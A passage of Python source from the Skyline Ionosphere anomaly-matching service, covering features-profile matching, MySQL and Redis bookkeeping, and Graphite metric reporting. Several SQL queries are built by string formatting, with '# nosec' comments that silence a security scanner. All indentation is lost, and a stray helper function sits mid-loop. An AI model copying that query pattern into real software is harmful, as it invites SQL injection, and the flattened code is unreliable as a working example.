(str(settings.IONOSPHERE_FEATURES_PERCENT_SIMILAR),
str(fp_id), str(percent_different)))
if minmax_not_anomalous:
not_anomalous = True
minmax = 1
# Created time series resources for graphing in
# the matched page
# Clean up
if minmax_check:
try:
clean_file = anomalous_ts_csv
if os.path.isfile(anomalous_ts_csv):
self.remove_metric_check_file(str(anomalous_ts_csv))
logger.info('cleaned up - %s' % clean_file)
except:
logger.info('no anomalous_ts_csv file to clean up')
try:
clean_file = anomalous_fp_fname_out
if os.path.isfile(anomalous_fp_fname_out):
self.remove_metric_check_file(str(anomalous_fp_fname_out))
logger.info('cleaned up - %s' % clean_file)
except:
logger.info('no anomalous_fp_fname_out file to clean up')
# END - Feature #2404: Ionosphere - fluid approximation
if not_anomalous:
self.not_anomalous.append(base_name)
# update matched_count in ionosphere_table
matched_timestamp = int(time())
# @added 20170804 - Bug #2130: MySQL - Aborted_clients
# Set a conditional here to only get_an_engine if no engine, this
# is probably responsible for the Aborted_clients, as it would have
# left the acquired engine orphaned
# Testing on skyline-dev-3-40g-gra1 Fri Aug 4 16:08:14 UTC 2017
if not engine:
try:
engine, log_msg, trace = get_an_engine()
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get a MySQL engine to update matched details in db for %s' % (str(fp_id)))
if not engine:
logger.error('error :: engine not obtained to update matched details in db for %s' % (str(fp_id)))
try:
connection = engine.connect()
connection.execute(
ionosphere_table.update(
ionosphere_table.c.id == fp_id).
values(matched_count=ionosphere_table.c.matched_count + 1,
last_matched=matched_timestamp))
connection.close()
logger.info('updated matched_count for %s' % str(fp_id))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not update matched_count and last_matched for %s ' % str(fp_id))
# @added 20170107 - Feature #1844: ionosphere_matched DB table
# Added ionosphere_matched update
# @modified 20170804 - Bug #2130: MySQL - Aborted_clients
# Set a conditional here to only get_an_engine if no engine, this
# is probably responsible for the Aborted_clients, as it would have
# left the acquired engine orphaned
# Testing on skyline-dev-3-40g-gra1 Fri Aug 4 16:08:14 UTC 2017
if not engine:
try:
engine, log_msg, trace = get_an_engine()
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get a MySQL engine to update ionosphere_matched for %s' % (str(fp_id)))
if not engine:
logger.error('error :: engine not obtained to update ionosphere_matched for %s' % (str(fp_id)))
try:
ionosphere_matched_table, log_msg, trace = ionosphere_matched_table_meta(skyline_app, engine)
logger.info(log_msg)
logger.info('ionosphere_matched_table OK')
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get ionosphere_matched_table meta for %s' % base_name)
# @added 20180620 - Feature #2404: Ionosphere - fluid approximation
# Added minmax scaling values
if minmax_not_anomalous == 1:
minmax_fp_features_sum = float(minmax_fp_features_sum)
minmax_fp_features_count = int(minmax_fp_features_count)
minmax_anomalous_features_sum = float(minmax_anomalous_features_sum)
minmax_anomalous_features_count = int(minmax_anomalous_features_count)
else:
minmax_fp_features_sum = 0
minmax_fp_features_count = 0
minmax_anomalous_features_sum = 0
minmax_anomalous_features_count = 0
try:
connection = engine.connect()
# @modified 20170107 - Feature #1852: Ionosphere - features_profile matched graphite graphs
# Feature #1844: ionosphere_matched DB table
# Added all_calc_features_sum, all_calc_features_count,
# sum_calc_values, common_features_count, tsfresh_version
ins = ionosphere_matched_table.insert().values(
fp_id=int(fp_id),
metric_timestamp=int(metric_timestamp),
all_calc_features_sum=float(all_calc_features_sum),
all_calc_features_count=len(all_calc_features_sum_list),
sum_common_values=float(sum_calc_values),
common_features_count=int(relevant_calc_feature_values_count),
tsfresh_version=str(tsfresh_version),
# @added 20180620 - Feature #2404: Ionosphere - fluid approximation
# Added minmax scaling values
minmax=minmax,
minmax_fp_features_sum=minmax_fp_features_sum,
minmax_fp_features_count=minmax_fp_features_count,
minmax_anomalous_features_sum=minmax_anomalous_features_sum,
minmax_anomalous_features_count=minmax_anomalous_features_count,
# @added 2018075 - Task #2446: Optimize Ionosphere
# Branch #2270: luminosity
fp_count=fp_count, fp_checked=fp_checked)
result = connection.execute(ins)
connection.close()
new_matched_id = result.inserted_primary_key[0]
# @modified 20180620 - Feature #2404: Ionosphere - fluid approximation
# Added minmax
if minmax == 0:
logger.info('new ionosphere_matched id: %s' % str(new_matched_id))
else:
logger.info('new minmax scaled ionosphere_matched id: %s' % str(new_matched_id))
except:
logger.error(traceback.format_exc())
logger.error(
'error :: could not update ionosphere_matched for %s with timestamp %s' % (
str(fp_id), str(metric_timestamp)))
# @added 20170331 - Task #1988: Review - Ionosphere layers - always show layers
# Feature #1960: ionosphere_layers
# Added mirror functionality of the layers_id_matched_file
# for feature profile matches too as it has proved useful
# in the frontend with regards to training data sets being
# matched by layers and can do the same for in the frontend
# training data for feature profile matches too.
if not_anomalous:
profile_id_matched_file = '%s/%s.profile_id_matched.fp_id' % (
metric_training_data_dir, base_name)
if not os.path.isfile(profile_id_matched_file):
try:
write_data_to_file(skyline_app, profile_id_matched_file, 'w', str(fp_id))
logger.info('added matched fp_id %s - %s' % (
str(fp_id), profile_id_matched_file))
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add matched fp_id %s - %s' % (
str(fp_id), profile_id_matched_file))
# @added 20170115 - Feature #1854: Ionosphere learn - generations
# Stop on the first match
break
# https://docs.scipy.org/doc/numpy/reference/generated/numpy.testing.assert_almost_equal.html
# @added 20161214 - Add a between timeframe option, e.g. if
# fp match, only see this as not anomalous if hour (and or min)
# is between x and y - handle rollovers, cron log archives, etc.
logger.info('debug :: %s is a features profile for %s' % (str(fp_id), base_name))
# @added 20170115 - Feature #1854: Ionosphere learn - generations
# If this is an ionosphere_learn check them we handle it before
# the others and exit and ionosphere_learn uses the Redis work
# queue. Here we go! Learn!
if added_by == 'ionosphere_learn':
if not_anomalous:
logger.info('an ionosphere_learn metric has been found to be not anomalous before')
# @added 20170607 - Feature #2010: Ionosphere learn - rate limiting profile learning
learning_rate_limited = False
now = int(time())
rate_limit_timestamp = now - 3600
rate_limit_datetime = datetime.fromtimestamp(rate_limit_timestamp)
f = '%Y-%m-%d %H:%M:%S'
after_datetime = rate_limit_datetime.strftime(f)
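# Rate limiting sketch: the query below looks for any features profile
# for this metric with generation > 1 created within the last hour; if
# one exists at an equal or greater full_duration, learning is skipped
# for this run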
try:
connection = engine.connect()
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
result = connection.execute(
'SELECT * FROM ionosphere WHERE metric_id=%s AND created_timestamp > \'%s\' AND generation > 1' % (str(metrics_id), str(after_datetime))) # nosec
for row in result:
last_full_duration = row['full_duration']
if int(full_duration) <= int(last_full_duration):
learning_rate_limited = True
break
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to determine whether learning should be rate limited')
if learning_rate_limited:
logger.info('learning currently dynamically rate limited on %s' % str(base_name))
# Exit the ionosphere_learn check
self.remove_metric_check_file(str(metric_check_file))
if engine:
engine_disposal(engine)
return
else:
logger.info('learning is not currently rate limited on %s' % str(base_name))
# @added 20170605 - Bug #2038: Ionosphere learn parent generation incorrect
# Determine generation of the matched fp not the last in the
# list
try:
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
stmt = 'SELECT generation FROM ionosphere WHERE id=%s' % str(fp_id) # nosec
connection = engine.connect()
for row in engine.execute(stmt):
matched_fp_generation = int(row['generation'])
connection.close()
logger.info(
'determined matched fp_id %s is a generation %s profile' % (
str(fp_id), str(matched_fp_generation)))
current_fp_generation = matched_fp_generation
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine generation from ionosphere table for fp id %s' % str(fp_id))
logger.info(
'ionosphere_learn metric matches the generation %s features profile id %s - %s' % (
str(current_fp_generation), str(fp_id), base_name))
# Added Redis to work_set, learn will then go off and create
# the features profile with the parent training data if
# less than max_generations, although ionosphere_learn
# should not send Ionosphere any work if the result would
# be greater than max_generations
logger.info('adding work item to Redis set ionosphere.learn.work')
ionosphere_job = 'learn_fp_learnt'
work_deadline = 'Soft'
try:
logger.info(
'LEARNT :: adding work to Redis ionosphere.learn.work set - [\'%s\', \'%s\', %s, \'%s\', %s, %s] to create a learnt features profile' % (
work_deadline, str(ionosphere_job), str(metric_timestamp), base_name,
str(fp_id), str(current_fp_generation)))
self.redis_conn.sadd('ionosphere.learn.work', ['Soft', str(ionosphere_job), int(metric_timestamp), base_name, int(fp_id), int(current_fp_generation)])
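# The work item is a list of
# [deadline, job, metric_timestamp, base_name, fp_id, generation]; note
# the deadline added here is the literal 'Soft' rather than the
# work_deadline variable set above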
except:
logger.error(traceback.format_exc())
logger.error(
'error :: failed adding work to Redis ionosphere.learn.work set - [\'%s\', \'%s\', %s, \'%s\', %s, %s] to make a learn features profile later' % (
work_deadline, str(ionosphere_job), str(metric_timestamp), base_name,
str(fp_id), str(current_fp_generation)))
# Exit the ionosphere_learn check
self.remove_metric_check_file(str(metric_check_file))
if engine:
engine_disposal(engine)
return
# @added 20170306 - Feature #1960: ionosphere_layers
# Here we go, let us TEACH you properly. We only evaluate
# the Ionosphere layer algorithms after Skyline has had an
# opportunity to match the original and learnt features
# profiles. This enables the original, evolutionary,
# generations based learning to be continually evaluated.
# This needs to happen for any future implementation of
# Feature #1888: Ionosphere learn - evolutionary maturity forget
logger.info('layers algorithms check')
check_layers_algorithms = False
if not not_anomalous:
check_layers_algorithms = True
if added_by == 'ionosphere_learn':
check_layers_algorithms = False
logger.info('ionosphere_learn - layers algorithms check - False')
else:
logger.info('layers algorithms check - True, %s layers to be checked' % str(fp_layers_count))
else:
logger.info('a features profile matched as not_anomalous - layers algorithms check - False')
if check_layers_algorithms and fp_layers_present:
full_duration_in_hours = int(settings.FULL_DURATION) / 3600
mirage_full_duration_json_file = '%s/%s.mirage.redis.%sh.json' % (
metric_training_data_dir, base_name,
str(int(full_duration_in_hours)))
if os.path.isfile(mirage_full_duration_json_file):
full_duration_json_file = mirage_full_duration_json_file
else:
full_duration_json_file = '%s/%s.json' % (metric_training_data_dir, base_name)
anomalous_timeseries = None
if os.path.isfile(full_duration_json_file):
logger.info('full duration ts json available for layers check - %s' % (full_duration_json_file))
try:
# Read the timeseries json file
with open((full_duration_json_file), 'r') as f:
raw_timeseries = f.read()
timeseries_array_str = str(raw_timeseries).replace('(', '[').replace(')', ']')
anomalous_timeseries = literal_eval(timeseries_array_str)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not load json for layers check - %s' % (base_name))
logger.info('data points surfaced for layers check - %s' % (len(anomalous_timeseries) if anomalous_timeseries else 0))
else:
logger.error('error :: full duration ts json for layers was not found - %s' % (full_duration_json_file))
matched_layers_id = None
for layers_id in fp_layers_ids:
if not not_anomalous:
logger.info('checking layers_id %s - %s layers profiles of %s possible layers' % (
str(layers_id), str(layers_checked_count), str(fp_layers_count)))
if not_anomalous:
logger.info('skipping checking layers_id %s - %s layers profiles of %s possible layers as layer id %s already matched' % (
str(layers_id), str(layers_checked_count), str(fp_layers_count), str(matched_layers_id)))
continue
if int(layers_id) != 0:
# @added 2018075 - Task #2446: Optimize Ionosphere
# Branch #2270: luminosity
# @modified 20181014 - Feature #2430: Ionosphere validate learnt features profiles page
# layers_checked += 1
layers_checked_count += 1
# Get the layers algorithms and run then on the timeseries
# @modified 20170307 - Feature #1960: ionosphere_layers
# Use except on everything, remember how fast Skyline can iterate
try:
self.layers_checked.append(layers_id)
# @added 2018075 - Task #2446: Optimize Ionosphere
# Branch #2270: luminosity
# not_anomalous = run_layer_algorithms(base_name, layers_id, anomalous_timeseries)
# @modified 20181013 - Feature #2430: Ionosphere validate learnt features profiles page
# not_anomalous = run_layer_algorithms(base_name, layers_id, anomalous_timeseries, fp_layers_count, layers_checked)
not_anomalous = run_layer_algorithms(base_name, layers_id, anomalous_timeseries, fp_layers_count, layers_checked_count)
if not_anomalous:
matched_layers_id = layers_id
except:
logger.error(traceback.format_exc())
logger.error('error :: run_layer_algorithms failed for layers_id - %s' % (str(layers_id)))
if not_anomalous:
logger.info('not_anomalous :: layers_id %s was matched after checking %s layers profiles of %s possible layers' % (
str(layers_id), str(layers_checked_count), str(fp_layers_count)))
else:
logger.info('still anomalous :: layers_id %s was NOT matched after checking %s layers profiles of %s possible layers' % (
str(layers_id), str(layers_checked_count), str(fp_layers_count)))
if not not_anomalous:
logger.info('anomalous - no features profiles layers were matched - %s' % base_name)
# @added 20170308 - Feature #1960: ionosphere_layers
# Feature #1854: Ionosphere learn
# A create a layer_id matched txt file in the training_data dir
# to advise the operator if a training_data set has been matched
# by a layer. Further below if app is not ionosphere_learn a
# 'learn_fp_generation' ionosphere_job is added so ionosphere_learn
# can still try and learn from the existing features profiles
# that exist even if a layer matched as not_anomalous.
if not_anomalous:
layers_id_matched_file = '%s/%s.layers_id_matched.layers_id' % (
metric_training_data_dir, base_name)
if not os.path.isfile(layers_id_matched_file):
try:
write_data_to_file(skyline_app, layers_id_matched_file, 'w', str(matched_layers_id))
logger.info('added matched layers_id %s - %s' % (
str(matched_layers_id), layers_id_matched_file))
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add matched layers_id %s - %s' % (
str(matched_layers_id), layers_id_matched_file))
else:
logger.info('no layers algorithm check required')
# Ionosphere layers DONE
if not not_anomalous:
logger.info('anomalous - no feature profiles were matched - %s' % base_name)
# @added 20170116 - Feature #1854: Ionosphere learn
# If this is an ionosphere_learn check an Ionosphere alert will
# not be sent back to Analyzer, Mirage or the ionosphere.learn.work
# Redis set. We exit, work is done.
if added_by == 'ionosphere_learn':
logger.info('ionosphere_learn check complete - %s' % base_name)
self.remove_metric_check_file(str(metric_check_file))
if engine:
engine_disposal(engine)
return
self.anomalous_metrics.append(base_name)
# Send to panorama as Analyzer and Mirage will only alert on the
# anomaly, they will not push it to Panorama
if settings.PANORAMA_ENABLED:
if not os.path.exists(settings.PANORAMA_CHECK_PATH):
mkdir_p(settings.PANORAMA_CHECK_PATH)
# Note:
# The values are enclosed in single quotes intentionally
# as the imp.load_source used results in a shift in the
# decimal position when double quoted, e.g.
# value = "5622.0" gets imported as
# 2016-03-02 12:53:26 :: 28569 :: metric variable - value - 562.2
# single quoting results in the desired,
# 2016-03-02 13:16:17 :: 1515 :: metric variable - value - 5622.0
added_at = str(int(time()))
source = 'graphite'
panaroma_anomaly_data = 'metric = \'%s\'\n' \
'value = \'%s\'\n' \
'from_timestamp = \'%s\'\n' \
'metric_timestamp = \'%s\'\n' \
'algorithms = %s\n' \
'triggered_algorithms = %s\n' \
'app = \'%s\'\n' \
'source = \'%s\'\n' \
'added_by = \'%s\'\n' \
'added_at = \'%s\'\n' \
% (base_name, str(anomalous_value), str(int(from_timestamp)),
str(int(metric_timestamp)), str(settings.ALGORITHMS),
str(triggered_algorithms), skyline_app, source,
this_host, added_at)
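# The resulting check file is a small Python-syntax variables file,
# e.g. (illustrative values only):
# metric = 'stats.webapp.requests'
# value = '5622.0'
# from_timestamp = '1529923200'
# metric_timestamp = '1529926800'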
# Create an anomaly file with details about the anomaly
panaroma_anomaly_file = '%s/%s.%s.txt' % (
settings.PANORAMA_CHECK_PATH, added_at,
base_name)
try:
write_data_to_file(
skyline_app, panaroma_anomaly_file, 'w',
panaroma_anomaly_data)
logger.info('added panorama anomaly file :: %s' % (panaroma_anomaly_file))
self.sent_to_panorama.append(base_name)
except:
logger.error('error :: failed to add panorama anomaly file :: %s' % (panaroma_anomaly_file))
logger.info(traceback.format_exc())
# alert ... hmmm the harder part, maybe not all the resources
# are already created, so just determining ALERTS and firing a
# trigger_alert (pull in alerter.py and mirage_alerters.py?)
# OR send back to app via Redis
# @modified 20170116 - Feature #1854: Ionosphere learn
# Only do the cache_key if not ionosphere_learn
if added_by != 'ionosphere_learn':
cache_key = 'ionosphere.%s.alert.%s.%s' % (added_by, metric_timestamp, base_name)
try:
self.redis_conn.setex(
cache_key, 300,
[float(anomalous_value), base_name, int(metric_timestamp), triggered_algorithms, full_duration])
logger.info(
'add Redis alert key - %s - [%s, \'%s\', %s, %s]' %
(cache_key, str(anomalous_value), base_name, str(int(metric_timestamp)),
str(triggered_algorithms)))
except:
logger.error(traceback.format_exc())
logger.error(
'error :: failed to add Redis key - %s - [%s, \'%s\', %s, %s]' %
(cache_key, str(anomalous_value), base_name, str(int(metric_timestamp)),
str(triggered_algorithms)))
# @added 20170116 - Feature #1854: Ionosphere learn
# Added an ionosphere_learn job for the timeseries that did not
# match any profiles. Here we go! Learn!
if added_by != 'ionosphere_learn':
ionosphere_job = 'learn_fp_generation'
logger.info(
'adding an ionosphere_learn %s job for the timeseries that did not match any profiles - %s' % (
ionosphere_job, base_name))
try:
logger.info(
'adding work to Redis ionosphere.learn.work set - [\'Soft\', \'%s\', %s, \'%s\', None, None] to make a learn features profile later' % (
str(ionosphere_job), str(int(metric_timestamp)),
base_name))
self.redis_conn.sadd('ionosphere.learn.work', ['Soft', str(ionosphere_job), int(metric_timestamp), base_name, None, None])
except:
logger.error(traceback.format_exc())
logger.error(
'error :: failed adding work to Redis ionosphere.learn.work set - [\'Soft\', \'%s\', %s, \'%s\', None, None] to make a learn features profile later' % (
str(ionosphere_job), str(int(metric_timestamp)),
base_name))
self.remove_metric_check_file(str(metric_check_file))
if engine:
engine_disposal(engine)
return
self.remove_metric_check_file(str(metric_check_file))
if engine:
engine_disposal(engine)
return
def run(self):
"""
Called when the process initializes.
"""
# Log management to prevent overwriting
# Allow the bin/<skyline_app>.d to manage the log
if os.path.isfile(skyline_app_logwait):
try:
logger.info('removing %s' % skyline_app_logwait)
os.remove(skyline_app_logwait)
except OSError:
logger.error('error :: failed to remove %s, continuing' % skyline_app_logwait)
pass
now = time()
log_wait_for = now + 5
while now < log_wait_for:
if os.path.isfile(skyline_app_loglock):
sleep(.1)
now = time()
else:
now = log_wait_for + 1
logger.info('starting %s run' % skyline_app)
if os.path.isfile(skyline_app_loglock):
logger.error('error :: bin/%s.d log management seems to have failed, continuing' % skyline_app)
try:
os.remove(skyline_app_loglock)
logger.info('log lock file removed')
except OSError:
logger.error('error :: failed to remove %s, continuing' % skyline_app_loglock)
pass
else:
logger.info('bin/%s.d log management done' % skyline_app)
while 1:
now = time()
# Make sure Redis is up
try:
self.redis_conn.ping()
if ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: connected to Redis')
except:
logger.error('error :: cannot connect to redis at socket path %s' % (
settings.REDIS_SOCKET_PATH))
sleep(30)
# @modified 20180519 - Feature #2378: Add redis auth to Skyline and rebrow
if settings.REDIS_PASSWORD:
self.redis_conn = StrictRedis(password=settings.REDIS_PASSWORD, unix_socket_path=settings.REDIS_SOCKET_PATH)
else:
self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
continue
# Report app up
try:
self.redis_conn.setex(skyline_app, 120, now)
logger.info('updated Redis key for %s up' % skyline_app)
except:
logger.error('error :: failed to update Redis key for %s up' % skyline_app)
# purge_old_data_dirs after every check file run, this takes less
# than a second and keeps the purging somewhat consistent with
# input rate.
try:
logger.info('purging any old training data')
self.purge_old_data_dirs(
settings.IONOSPHERE_DATA_FOLDER,
settings.IONOSPHERE_KEEP_TRAINING_TIMESERIES_FOR)
except:
logger.error('error :: purge_old_data_dirs - %s' % traceback.format_exc())
if ENABLE_IONOSPHERE_DEBUG:
logger.info(
'debug :: self.purge_old_data_dirs(%s, %s)' % (
settings.IONOSPHERE_DATA_FOLDER,
settings.IONOSPHERE_KEEP_TRAINING_TIMESERIES_FOR))
# @added 20170110 - Feature #1854: Ionosphere learn
# purge_old_data_dirs learn data
if settings.IONOSPHERE_LEARN:
try:
logger.info('purging any old learning data')
self.purge_old_data_dirs(
settings.IONOSPHERE_LEARN_FOLDER,
settings.IONOSPHERE_KEEP_TRAINING_TIMESERIES_FOR)
except:
logger.error('error :: purge_old_data_dirs learn - %s' % traceback.format_exc())
if ENABLE_IONOSPHERE_DEBUG:
logger.info(
'debug :: self.purge_old_data_dirs(%s, %s)' % (
settings.IONOSPHERE_LEARN_FOLDER,
settings.IONOSPHERE_KEEP_TRAINING_TIMESERIES_FOR))
# @added 20170916 - Feature #1996: Ionosphere - matches page
# Create the ionosphere_summary_memcache_object
# @modified 20180103 - Feature #1996: Ionosphere - matches page
# The ionosphere_summary_list memcache object is not managed in
# ionosphere.py and was an artefact of some dev work that may
# resume at some point
# if settings.MEMCACHE_ENABLED:
# try:
# logger.info('updating the ionosphere_summary_memcache_object')
# self.update_ionosphere_summary_memcache_object
# except:
# logger.error('error :: update_ionosphere_summary_memcache_object - %s' % traceback.print_exc())
# self.populate the database metadata tables
# What is my host id in the Skyline panorama DB?
host_id = False
# @added 20170825 - Task #2132: Optimise Ionosphere DB usage
# Check memcached before MySQL
if settings.MEMCACHE_ENABLED:
hosts_id_key = 'hosts.id.%s' % this_host
try:
host_id = self.memcache_client.get(hosts_id_key)
# if memcache does not have the key the response to the
# client is None, it does not raise an exception
except:
logger.error('error :: failed to get %s from memcache' % hosts_id_key)
try:
self.memcache_client.close()
except:
# @modified 20170913 - Task #2160: Test skyline with bandit
# pass
logger.error('error :: failed to close memcache_client')
if host_id:
logger.info('using memcache %s key data' % hosts_id_key)
logger.info('host_id: %s' % str(host_id))
if not host_id:
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
query = 'select id FROM hosts WHERE host=\'%s\'' % this_host # nosec
results = mysql_select(skyline_app, query)
if results:
host_id = results[0][0]
logger.info('host_id: %s' % str(host_id))
else:
logger.info('failed to determine host id of %s' % this_host)
if host_id and settings.MEMCACHE_ENABLED:
try:
self.memcache_client.set(hosts_id_key, int(host_id))
logger.info('populated memcache %s key' % hosts_id_key)
except:
logger.error('error :: failed to set %s in memcache' % hosts_id_key)
try:
self.memcache_client.close()
except:
# @modified 20170913 - Task #2160: Test skyline with bandit
# pass
logger.error('error :: failed to close memcache_client')
# if not known - INSERT hostname INTO host
if not host_id:
logger.info('inserting %s into hosts table' % this_host)
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
query = 'insert into hosts (host) VALUES (\'%s\')' % this_host # nosec
host_id = self.mysql_insert(query)
if host_id:
logger.info('new host_id: %s' % str(host_id))
if not host_id:
logger.error(
'error :: failed to determine or insert %s into the hosts table' %
this_host)
sleep(30)
continue
"""
Determine if any metric check file has been added to process
"""
while True:
metric_var_files = False
try:
metric_var_files = [f for f in listdir(settings.IONOSPHERE_CHECK_PATH) if isfile(join(settings.IONOSPHERE_CHECK_PATH, f))]
except:
logger.error('error :: failed to list files in check dir')
logger.info(traceback.format_exc())
if not metric_var_files:
logger.info('sleeping 20 no metric check files')
sleep(20)
up_now = time()
# Report app up
try:
self.redis_conn.setex(skyline_app, 120, up_now)
logger.info('updated Redis key for %s up' % skyline_app)
except:
logger.error('error :: failed to update Redis key for %s up' % skyline_app)
# @added 20161228 - Feature #1828: ionosphere - mirage Redis data features
# Branch #922: Ionosphere
# Bringing Ionosphere online - do alert on Ionosphere metrics
# Manage the ionosphere.unique_metrics Redis set which is queried
# by Analyzer and Mirage, yes and we use multiprocessing
last_update = None
try:
last_update = self.redis_conn.get('ionosphere.manage_ionosphere_unique_metrics')
except Exception as e:
logger.error('error :: could not query Redis for ionosphere.manage_ionosphere_unique_metrics: %s' % e)
if not last_update:
pids = []
now = time()
try:
logger.info('starting manage_ionosphere_unique_metrics process')
p = Process(target=self.manage_ionosphere_unique_metrics)
pids.append(p)
p.start()
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to start manage_ionosphere_unique_metrics')
# Self monitor process and terminate if run for too long
p_starts = time()
while time() - p_starts <= 5:
if any(p.is_alive() for p in pids):
# Just to avoid hogging the CPU
sleep(.1)
else:
# All the processes are done, break now.
time_to_run = time() - p_starts
logger.info(
'manage_ionosphere_unique_metrics completed in %.2f seconds' % (
time_to_run))
break
else:
# We only enter this if we didn't 'break' above.
logger.info('%s :: timed out, killing manage_ionosphere_unique_metrics process' % (skyline_app))
for p in pids:
try:
p.terminate()
# p.join()
logger.info('%s :: killed manage_ionosphere_unique_metrics process' % (skyline_app))
except:
logger.error(traceback.format_exc())
logger.error('error :: killing all manage_ionosphere_unique_metrics processes')
# Discover metric anomalies to insert
metric_var_files = False
try:
metric_var_files = [f for f in listdir(settings.IONOSPHERE_CHECK_PATH) if isfile(join(settings.IONOSPHERE_CHECK_PATH, f))]
except:
logger.error('error :: failed to list files in check dir')
logger.info(traceback.format_exc())
# @added 20170104 - Feature #1842: Ionosphere - Graphite now graphs
# Task #1658: Patterning Skyline Ionosphere
# Send Ionosphere metrics to Graphite every minute now that
# Ionosphere is better tuned and Reset lists
cache_key = '%s.sent_graphite_metrics' % skyline_app
redis_sent_graphite_metrics = False
try:
redis_sent_graphite_metrics = self.redis_conn.get(cache_key)
except Exception as e:
logger.error('error :: could not query Redis for key %s: %s' % (cache_key, e))
# Flush metrics to Graphite
if not redis_sent_graphite_metrics:
try:
not_anomalous = str(len(self.not_anomalous))
except:
not_anomalous = '0'
logger.info('not_anomalous :: %s' % not_anomalous)
send_metric_name = '%s.not_anomalous' % skyline_app_graphite_namespace
send_graphite_metric(skyline_app, send_metric_name, not_anomalous)
try:
total_anomalies = str(len(self.anomalous_metrics))
except:
total_anomalies = '0'
logger.info('total_anomalies :: %s' % total_anomalies)
send_metric_name = '%s.total_anomalies' % skyline_app_graphite_namespace
send_graphite_metric(skyline_app, send_metric_name, total_anomalies)
try:
training_metrics = str(len(self.training_metrics))
except:
training_metrics = '0'
logger.info('training metrics :: %s' % training_metrics)
send_metric_name = '%s.training_metrics' % skyline_app_graphite_namespace
send_graphite_metric(skyline_app, send_metric_name, training_metrics)
try:
features_profiles_checked = str(len(self.features_profiles_checked))
except:
features_profiles_checked = '0'
logger.info('fps checked count :: %s' % features_profiles_checked)
send_metric_name = '%s.fps_checked' % skyline_app_graphite_namespace
# @modified 20170306 - Feature #1960: ionosphere_layers
# Corrected namespace
# send_graphite_metric(skyline_app, send_metric_name, not_anomalous)
send_graphite_metric(skyline_app, send_metric_name, features_profiles_checked)
# @added 20170306 - Feature #1960: ionosphere_layers
try:
# @modified 20181014 - Feature #2430: Ionosphere validate learnt features profiles page
# layers_checked = str(len(self.layers_checked))
str_layers_checked = str(len(self.layers_checked))
except:
str_layers_checked = '0'
logger.info('layers checked count :: %s' % str_layers_checked)
send_metric_name = '%s.layers_checked' % skyline_app_graphite_namespace
send_graphite_metric(skyline_app, send_metric_name, str_layers_checked)
if settings.PANORAMA_ENABLED:
try:
sent_to_panorama = str(len(self.sent_to_panorama))
except:
sent_to_panorama = '0'
logger.info('sent_to_panorama :: %s' % sent_to_panorama)
send_metric_name = '%s.sent_to_panorama' % skyline_app_graphite_namespace
send_graphite_metric(skyline_app, send_metric_name, sent_to_panorama)
sent_graphite_metrics_now = int(time())
try:
self.redis_conn.setex(cache_key, 59, sent_graphite_metrics_now)
logger.info('updated Redis key - %s' % cache_key)
except:
logger.error('error :: failed to update Redis key - %s' % cache_key)
# Reset lists
self.anomalous_metrics[:] = []
self.not_anomalous[:] = []
self.features_profiles_checked[:] = []
self.training_metrics[:] = []
self.sent_to_panorama[:] = []
# @added 20170306 - Feature #1960: ionosphere_layers
self.layers_checked[:] = []
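# The flush above is gated to once per minute by a Redis key with a 59 second
# TTL: if the key is present the flush is skipped, otherwise the counters are
# sent and the key is re-set. A standalone sketch of that gate (the client,
# key name and flush callable are illustrative):
import time as _time_mod

def flush_once_per_minute(redis_conn, flush, key='app.sent_graphite_metrics'):
    """Run flush() at most once per minute, gated by a 59s TTL Redis key."""
    try:
        if redis_conn.get(key):
            return False
    except Exception:
        pass
    flush()
    try:
        redis_conn.setex(key, 59, int(_time_mod.time()))
    except Exception:
        pass
    return True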
ionosphere_job = False
learn_job = False
if metric_var_files:
ionosphere_job = True
break
# @added 20170113 - Feature #1854: Ionosphere learn
# Added the learn variable to spawn a spawn_learn_process when
# required.
work_queue_items = 0
if settings.IONOSPHERE_LEARN:
learn_work = None
try:
learn_work = self.redis_conn.smembers('ionosphere.learn.work')
except Exception as e:
logger.error('error :: could not query Redis for ionosphere.learn.work - %s' % e)
if learn_work:
work_queue_items = len(learn_work)
if work_queue_items > 0:
learn_job = True
if learn_job:
break
if ionosphere_job:
metric_var_files_sorted = sorted(metric_var_files)
metric_check_file = '%s/%s' % (settings.IONOSPHERE_CHECK_PATH, str(metric_var_files_sorted[0]))
# @added 20170108 - Feature #1830: Ionosphere alerts
# Adding lists of smtp_alerter_metrics and ionosphere_non_smtp_alerter_metrics
# Timed this takes 0.013319 seconds on 689 unique_metrics
unique_metrics = []
try:
unique_metrics = list(self.redis_conn.smembers(settings.FULL_NAMESPACE + 'unique_metrics'))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get the unique_metrics list from Redis')
unique_metrics = []
for metric_name in unique_metrics:
base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
for alert in settings.ALERTS:
pattern_match = False
if str(alert[1]) == 'smtp':
ALERT_MATCH_PATTERN = alert[0]
METRIC_PATTERN = base_name
pattern_match = False
try:
# Match by regex
alert_match_pattern = re.compile(ALERT_MATCH_PATTERN)
pattern_match = alert_match_pattern.match(METRIC_PATTERN)
if pattern_match:
pattern_match = True
if base_name not in self.ionosphere_smtp_alerter_metrics:
self.ionosphere_smtp_alerter_metrics.append(base_name)
except:
pattern_match = False
if not pattern_match:
# Match by substring
if alert[0] in base_name:
if base_name not in self.ionosphere_smtp_alerter_metrics:
self.ionosphere_smtp_alerter_metrics.append(base_name)
if base_name not in self.ionosphere_smtp_alerter_metrics:
if base_name not in self.ionosphere_non_smtp_alerter_metrics:  # avoid duplicate entries in the non-smtp list
self.ionosphere_non_smtp_alerter_metrics.append(base_name)
logger.info('smtp_alerter_metrics :: %s' % str(len(self.ionosphere_smtp_alerter_metrics)))
